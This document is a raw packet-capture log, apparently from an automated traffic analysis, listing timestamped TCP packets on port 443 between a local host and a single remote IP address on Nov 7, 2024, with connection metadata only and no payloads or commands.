                                                                                                                                                                              Nov 7, 2024 18:04:30.684348106 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.684633017 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.684665918 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.684694052 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.684695005 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.684708118 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.684714079 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.684743881 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.798794985 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.799348116 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.799371004 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.799402952 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.799412966 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.799473047 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.799500942 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.799514055 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.799521923 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.799551010 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.799570084 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.799633026 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.799640894 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.855112076 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.914572001 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.914583921 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.914628983 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.914628983 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.914716005 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.914722919 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.914735079 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.914813995 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.915363073 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.929999113 CET49722443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.930035114 CET44349722172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.930258989 CET49722443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.930768013 CET49722443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.930777073 CET44349722172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:31.548352957 CET44349722172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:31.549392939 CET49722443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:31.549407005 CET44349722172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:32.347992897 CET44349722172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:32.348092079 CET44349722172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:32.348165035 CET49722443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:32.360683918 CET49722443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:32.399446011 CET49729443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:32.399483919 CET44349729172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:32.399563074 CET49729443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:32.403266907 CET49729443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:32.403281927 CET44349729172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:33.046852112 CET44349729172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:33.048351049 CET49729443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:33.048367977 CET44349729172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:33.787929058 CET44349729172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:33.788022041 CET44349729172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:33.788110018 CET49729443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:33.789037943 CET49729443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:33.793811083 CET49738443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:33.793869972 CET44349738172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:33.793945074 CET49738443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:33.794264078 CET49738443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:33.794275999 CET44349738172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:34.419215918 CET44349738172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:34.420362949 CET49738443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:34.420392990 CET44349738172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:34.708648920 CET44349738172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:34.708764076 CET44349738172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:34.709450960 CET49738443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:34.709770918 CET49738443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:34.713726997 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:34.713783026 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:34.713850975 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:34.714169979 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:34.714184999 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.319230080 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.352590084 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.352624893 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.671787024 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.671837091 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.671868086 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.671900034 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.671910048 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.671931028 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.671942949 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.671950102 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.671976089 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.671989918 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.672036886 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.672075987 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.672082901 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.714592934 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.714602947 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.761527061 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.761574030 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.787103891 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.787167072 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.787291050 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.787328005 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.787390947 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.791834116 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.791925907 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.791968107 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.791971922 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.791996956 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.792033911 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.796586037 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.839493990 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.839523077 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.886357069 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.903592110 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.903696060 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.903729916 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.903744936 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.903776884 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.903810978 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.904344082 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.904424906 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.904455900 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.904465914 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.904479980 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.904511929 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.904519081 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.946285009 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.946325064 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.946388960 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:35.946427107 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:35.946485996 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.017268896 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.017364025 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.017400026 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.017419100 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.017441034 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.017455101 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.017491102 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.017771006 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.017812014 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.017822027 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.058242083 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.065922022 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.120764017 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.120807886 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.139404058 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.139462948 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.139477968 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.139523983 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.139811039 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.139818907 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.139863968 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.139977932 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.140019894 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.181592941 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.181603909 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.181647062 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.181663036 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.181691885 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.181704044 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.181730032 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.252458096 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.252469063 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.252531052 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.252561092 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.252582073 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.252619982 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.252633095 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.252691984 CET44349742172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.252742052 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.253102064 CET49742443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.262834072 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.262881994 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.262955904 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.263149977 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.263164043 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.871191978 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:36.872881889 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:36.872915030 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.482218981 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.482286930 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.482336998 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.482351065 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.482377052 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.482417107 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.482424974 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.482732058 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.482769966 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.482777119 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.483117104 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.483170033 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.483176947 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.527023077 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.527045965 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.573887110 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.597439051 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.597522974 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.597553015 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.597579956 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.597604990 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.597656012 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.629300117 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.629384995 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.629492044 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.629514933 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.629573107 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.629626036 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.629635096 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.683242083 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.683274031 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.712908983 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.712958097 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.713047981 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.713063002 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.713080883 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.713108063 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.744688034 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.745795965 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.745805979 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.784221888 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.784301043 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.784421921 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.784450054 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.785322905 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.788862944 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.828269005 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.828316927 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.828358889 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.828392029 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.828389883 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.828429937 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.828444958 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.831072092 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.860268116 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.899350882 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.899390936 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.899425030 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.899507999 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.899544954 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.899569988 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.904218912 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.907052994 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.907079935 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.944113970 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.944226027 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.944259882 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.945096016 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:37.975579977 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.975590944 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:37.975652933 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.014854908 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.014976025 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.015008926 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.015018940 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.015054941 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.015064001 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.059194088 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.059207916 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.059329987 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.090749979 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.090770006 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.090831041 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.130235910 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.130251884 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.130312920 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.135030031 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.135096073 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.174380064 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.174556017 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.176032066 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.176090002 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.245798111 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.245858908 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.245898962 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.245898962 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.245927095 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.245970011 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.290170908 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.290213108 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.290241003 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.290262938 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.290287018 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.290483952 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.361222982 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.361289024 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.361346006 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.361385107 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.366240978 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.366295099 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.405019999 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.405088902 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.405657053 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.405697107 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.476779938 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.476888895 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.481312037 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.481504917 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.481730938 CET44349747172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:38.481789112 CET49747443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:38.520369053 CET44349747172.67.182.214192.168.2.5
